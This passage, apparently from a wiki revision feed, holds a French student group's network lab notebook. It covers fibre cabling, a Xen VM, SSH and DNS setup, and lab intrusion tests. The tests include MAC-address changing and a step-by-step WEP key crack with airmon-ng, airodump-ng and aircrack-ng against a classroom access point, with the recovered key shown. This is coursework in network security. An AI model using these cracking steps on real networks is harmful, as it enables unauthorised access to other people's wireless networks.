* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier named.conf.local pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers db.jjlddelamuerto.space et db.57.48.193.in-addr.arpa :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=34954</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=34954"/>
				<updated>2016-11-07T10:31:25Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Intrusion par changement d'adresse MAC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
